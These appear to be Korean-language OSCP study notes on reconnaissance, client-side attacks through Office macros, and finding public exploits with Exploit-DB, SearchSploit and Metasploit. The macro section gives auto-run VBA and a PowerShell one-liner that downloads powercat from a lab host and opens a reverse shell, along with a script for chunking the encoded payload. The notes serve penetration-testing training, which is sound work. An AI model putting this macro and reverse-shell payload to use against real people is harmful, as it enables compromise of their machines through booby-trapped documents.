OSCP - 5(Client-side Attacks, Locating Public Exploits)

Target Reconnaissance

- Information Gathering

타겟과 직접 상호작용 하지 않고, 공개되어 있는 타겟 정보의 메타 데이터를 통해서 추가 정보를 확인할 수 있다.

site:example.com filetype:pdf 검색으로 타겟의 웹 페이지에 공개되어 있는 PDF file을 찾을 수도 있고,

 

gobuster -x(확장자) 옵션으로 검색도 가능하다.

kali@kali:~/Downloads$ gobuster dir -u 192.168.189.197 -x pdf -w /usr/share/wordlists/dirb/common.txt -t 5 

찾은 PDF 파일은 이후 exiftool 로 메타데이터 정보를 확인한다.

kali@kali:~/Downloads$ exiftool -a -u old.pdf

 

- Client Fingerprinting

라우팅 할 수 없는 내부 네트워크 대상에서 운영 체제 및 브라우저의 정보를 얻기 위해 진행

Canarytoken 활용

 

* Canarytoken : 토큰이 내장되어 있는 링크를 생성하는 무료 웹 서비스 도구

 

 

Exploiting Microsoft Office

- Preparing the Attack

- Installing Microsoft Office

- Leveraging Microsoft Word Macros

* Macro 는 Visual Basic for Applications(VBA) 로 작성 가능하다.

* Dynamic Data Exchange(DDE), Object Linking and Embedding(OLE) 는 목표 시스템의 큰 수정 없이는 오늘날 잘 동작하지 않는다.

 

Powercat 을 다운로드 하고 타겟에서 리버스 쉘을 실행시키기 위한 작업들

① Window Script Host Shell 을 이용하여 매크로에서 Powershell 실행

CreateObject("Wscript.Shell").Run "powershell"

 

② 오피스 매크로 자동 실행을 위한 함수 AutoOpen() Document_Open()

Sub AutoOpen()
  MyMacro
End Sub
Sub Document_Open()
  MyMacro
End Sub

 

③ ps 문 작성 이후 변수(Dim Str As String)에 넣기

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

* ps 문은 특정 문자 에러 피하기 위한 base64 인코딩(★ ★ ★ 인코딩 사이트에서 할때는 UTF-16LE !!!  (MS OS, Office용 유니코드) 로 설정해놓고 한다. 이거 때문에 많이 헤맸다....)

* VBA 는 문자열 입력 255개 제한으로 잘라서 변수에 넣어주기

str = "powershell.exe -nop -w hidden -e SQBFAwA...(Encoded base64)"

n = 50

for i in range(0, len(str), n):
print("Str = Str + " + '"' + str[i:i+n] + '"')

 

 

Abusing Windows Library Files

- Obtaining Code Execution via Windows Library Files

 

 

 

Locating Public Exploits

Online Exploit Resources

★  The Exploit Database : 공개 취약점들에 대한 exploit 모아둔 무료 아카이브

Packet Storm : 보안 뉴스, 취약점, tool 등에 대한 최신 소식

★★ GitHub : exploit을 포함한 code 공유 플랫폼(가장 넓고 개방적으로 이용 가능한 만큼 공급망 공격에도 많이 활용 됨)

Google Search Operators : 검색 연산자를 추가하여 상세 취약점 검색 가능

ex) kali@kali:~$ firefox --search "Microsoft Edge site:exploit-db.com"

 

Offline Exploit Resources

Exploit Frameworks

  - Metasploit : 간단한 사전 설정으로 미리 구성된 exploit을 실행하는 도구

  - Core Impact : 테스트 자동화 및 취약점 스캐너와 연동해 점검하는 도구

  - Canvas

  - The Browser Exploitation Framework(BeEF) : client-side attacks 에 중점을 둔 침투 테스트 도구

 

SearchSploit

  - 여러 옵션을 넣어 exploit 을 상세 검색하는 도구(Kali 에는 기본 설치되어있는 exploitdb package 를 활용.)

ex) kali@kali:~$ searchsploit remote smb microsoft windows

      kali@kali:~$ searchsploit -m windows/remote/48537.py  (-m 옵션은 현재 폴더 위치에 해당 파일 복사)

 

Nmap NSE Scripts

   - enumerate, brute force, fuzz, detect 등 의 다양한 동작을 자동화 한 도구

NSE(Nmap Scripting Engine)

Default scripts route : /usr/share/nmap/scripts/

 

Exploiting a Target

Putting It Together